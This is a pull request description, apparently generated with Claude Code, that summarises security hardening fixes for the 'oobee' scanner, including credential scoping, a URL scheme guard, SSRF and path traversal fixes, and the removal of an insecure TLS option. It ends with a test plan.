Remediates findings from the asgard cybersecurity scan (`~/oobee-v2-cybersecurity-report/oobee/`), prioritizing verified high/critical issues, plus removes the `OOBEE_ALLOW_INSECURE_TLS` escape hatch entirely.

### Verified high / critical

- **asgard-0017** — SRI for the Sentry CDN bundle. `generateOobeeClientScanner.ts` now fetches the `sri.json` map for the Sentry SDK version, emits `script.integrity` when available, and warns (but continues) if the integrity hash cannot be resolved. Overridable via `OOBEE_SENTRY_SDK_SRI`.
- **asgard-0010** — credential leak across origins. `splitAuthHeaders` now scopes `httpCredentials.origin` to the entry URL, so basic-auth credentials are not leaked when a page redirects cross-origin. Wired through `crawlDomain`, `crawlSitemap`, `crawlIntelligentSitemap`, `runCustom`, and `commonCrawlerFunc`.
- **asgard-0013 / 0019** — non-http(s) navigation guard. New `crawlers/guards/urlGuard.ts` intercepts navigation requests at the context level and blocks `javascript:` / `data:` / `file:` / `chrome:` / etc. Subframe navigation to disallowed schemes best-effort detaches the iframe. Wired into `crawlDomain`'s preNavigationHook.
- **asgard-0020** — PDF crop DoS. `pdfScreenshotFunc.ts` caps crop dimensions at 8192px and validates that PDF `location` is four finite numbers before allocating a canvas.
- **asgard-0021** — SSRF via file:// in sitemap `<loc>`. When the entry sitemap is fetched over http(s), recursive fetches to `file://` URLs are rejected.
- **asgard-0022** — HTML escape + safe-href allowlist in `pageAccordionBuilder.ejs` for URLs, page titles, and screenshot paths surfaced in the report modal.
- **asgard-0024** — path traversal via caller-supplied `randomToken`. `sanitisePathSegment` in `scanCustomFlow`, plus `assertSafeRandomToken` and `assertPathContains` in `utils.ts`, reject tokens outside `[A-Za-z0-9._-]` and paths that resolve outside `results/`.

### Additional hardening in this branch

- Removed `OOBEE_ALLOW_INSECURE_TLS` and every code path that consumed it, along with the accompanying `console.warn` shim. TLS verification is unconditionally enabled.
- Legacy Google Forms telemetry no longer falls back to opening the user's browser.
- Added `.sha256` sidecars alongside the portable Windows and Mac release zips, so oobee-desktop's `installer.ps1` can verify downloads.

### Compat regressions from the hardening (fixed in this branch)

- Non-ASCII `customFlowLabel` (CJK, accented Latin, Cyrillic, etc.) was being rejected by the new `assertSafeRandomToken`. `constants/common.ts` now normalizes label and domain characters to the same allowlist at token construction time.

## Test plan

- [ ] `npx tsc --noEmit` passes (verified locally)
- [ ] Run a headed custom-flow scan with a Japanese/Chinese `customFlowLabel`; result folder is created and populated
- [ ] Run a `crawlDomain` scan against an http:// site; scan completes normally
- [ ] Run a `crawlSitemap` scan whose sitemap references a `file://` URL; that entry is skipped, remote entries proceed
- [ ] Load a report HTML with a scan that includes URLs containing `&`, `<`, `>`, unicode — they render as text, not markup
- [ ] Sentry client bundle build emits an `integrity` attribute when `OOBEE_SENTRY_SDK_SRI` is set

🤖 Generated with [Claude Code](https://claude.com/claude-code)